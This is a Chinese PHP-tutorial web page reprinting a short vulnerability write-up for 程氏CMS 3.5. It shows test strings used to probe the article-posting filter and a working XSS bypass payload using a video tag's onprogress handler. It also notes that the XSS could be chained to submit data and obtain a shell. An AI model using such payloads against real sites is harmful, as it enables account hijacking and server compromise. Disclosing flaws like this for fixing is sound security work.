来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 发表文章处。先提交一段测试代码。img src=x onerror=xonerror onxxxximg src=x onxxxx=x xx onxxxx=x发现 结果只剩下了 onxxxx。那么 其机制大概是这样的。先过滤掉 onerror之类的危险字符串。...
发表文章处。
<img src=x/onerror=x>onerror onxxxx<img src=x onxxxx=><x xx onxxxx=x>
先过滤掉 onerror之类的危险字符串。再将 <>标签内的onxxx给过滤掉
<video src="xxx.xxx.xxx/a"a='>' onprogress=alert(1)>
<?php define("Web_Name","程氏CMS3.5"); //站点名称 define("Web_Url","localhost"); //站点域名 define("Web_Path","/"); //站点路径 define("Admin_Code","aaaaaa"); //后台验证码 define("Admin_Url",""); //后台访问域名,留空为取消 define("Web_Off",0); //网站开关 define("Web_Onneir","网站升级中..."); //网站关闭内容 define("Web_Mode",1); //网站运行模式 define("Html_Wjt",".htaccess"); //伪静态模式 define("Html_Index","index.html"); //主 ............. 双引号,所以可以通过
触发xss后可以利用js提交数据getshell 此前已有实例 就不写js代码了 修复方案:加强过滤 :) |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com